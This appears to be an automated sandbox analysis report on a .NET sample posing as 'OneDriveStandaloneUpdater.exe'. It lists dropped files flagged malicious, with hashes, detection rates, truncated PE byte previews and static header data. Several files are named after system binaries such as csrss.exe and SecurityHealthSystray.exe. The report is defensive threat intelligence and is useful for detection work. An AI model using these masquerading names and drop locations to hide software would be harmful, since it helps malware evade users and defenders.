Entropy (8bit):	5.0168086460579095
Encrypted:	false
SSDEEP:	96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
MD5:	69546E20149FE5633BCBA413DC3DC964
SHA1:	29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
SHA-256:	B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
SHA-512:	90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................V...}..................0..C.......(....o.......(....(....o.......(....s......(...........o....o.......0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

C:\Users\user\Desktop\ocVadywh.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\pbHguWQZ.log

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\pniscWHs.log

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\pzyaVZFL.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\rBkIrIJH.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\sjwHPvrg.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.0168086460579095
Encrypted:	false
SSDEEP:	96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
MD5:	69546E20149FE5633BCBA413DC3DC964
SHA1:	29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
SHA-256:	B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
SHA-512:	90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................V...}..................0..C.......(....o.......(....(....o.......(....s......(...........o....o.......0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

C:\Users\user\Desktop\tYWrkemb.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\vaJZGNqW.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\vcUYBlwU.log

Download File

Process:	C:\Users\user\Desktop\OneDriveStandaloneUpdater.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\vqLrRVyt.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\wnmzmVNo.log

Download File

Process:	C:\Users\Public\Documents\csrss.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xJPzewWS.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Network Shortcuts\MjlsqDcSPlv.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Windows\System32\CSC4209A55E9E1C448293632CEEB8D0515F.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.435108676655666
Encrypted:	false
SSDEEP:	24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
MD5:	931E1E72E561761F8A74F57989D1EA0A
SHA1:	B66268B9D02EC855EB91A5018C43049B4458AB16
SHA-256:	093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
SHA-512:	1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
Malicious:	false
Preview:	.... ...........................\|...<...............0...........\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

C:\Windows\System32\SecurityHealthSystray.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.934661083987368
Encrypted:	false
SSDEEP:	48:6hpDPtuM7Jt8Bs3FJsdcV4MKe27nIvqBHmOulajfqXSfbNtm:IPtPc+Vx9MnIvkAcjRzNt
MD5:	334C389581C9ADD7126547B995D748CB
SHA1:	2124D1866466138FED132B6332BABD966F5186E7
SHA-256:	D793F938B69DEA1F2ADA5C820AE8563AFFC02074938D0903ACE63F856848166B
SHA-512:	6151DEC05F10D317DFC653ACDA2E202807D4C20A5826C51035DB27D728C060D5088DDF6B1767CA2CBCEB6593DF57949E075B7DC4855196B0DA92BE8C69A6208D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...1..g.............................'... ...@....@.. ....................................@.................................D'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!................................................................(.....0..!.......r...pre..p.{....(....(....&..&......................0..........ri..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.625122004957738
Encrypted:	false
SSDEEP:	12:PL5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:ldUOAokItULVDv
MD5:	3E1A91FF574E800570DDD3A0A677AF8C
SHA1:	7F165D71C5A8CFC584AE3E394F231EA4AD649981
SHA-256:	D0E4457FB83940D485AD14C9F72BBE14182D9CDA4443D80D6E2DF541513B7690
SHA-512:	70D72FD3431CB243AEC1561008DD6CF52FC0E91A4BB3A9EC03FB268ED8FD6358EB6CE4D147483609F290F02D6942D6FE1B9885DC4C23A445F762C99C8E05A89D
Malicious:	false
Preview:	..Pinging 965969 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.45838062222636
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	OneDriveStandaloneUpdater.exe
File size:	848'896 bytes
MD5:	c1f1bea182f1c3477c2f133c3ac26930
SHA1:	2145c09d2c3279ac83e844c4d80e7aa219e99b8d
SHA256:	1054af5e9206aa0cb650a4e58900bcd369a554e64eaa89f56cb35cd105386eb5
SHA512:	6af6336782b29bdab906e4d289cb5c2c8500ba8a20dee53def21960e62afc28ec6756b746b4e4036a30726984a60b656b3d529b4abc119953267e91be4992a4d
SSDEEP:	12288:P6TnOzi5kaag8hpT77JJMA+XSpW3Ari4VVyZC0+1cw2jINof7+vEnkdsOZ6:P6TnYa+T7dJMA+i3iE0nHfW6
TLSH:	3F05D8282AEE1539F0B3AFB54BD57886D5AEF5B3770E954D08C103C68212B40DE9673B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.f............................N.... ... ....@.. .......................`............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4d0a4e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66FD73FD [Wed Oct 2 16:25:33 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd0a00	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd2000	0x320	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
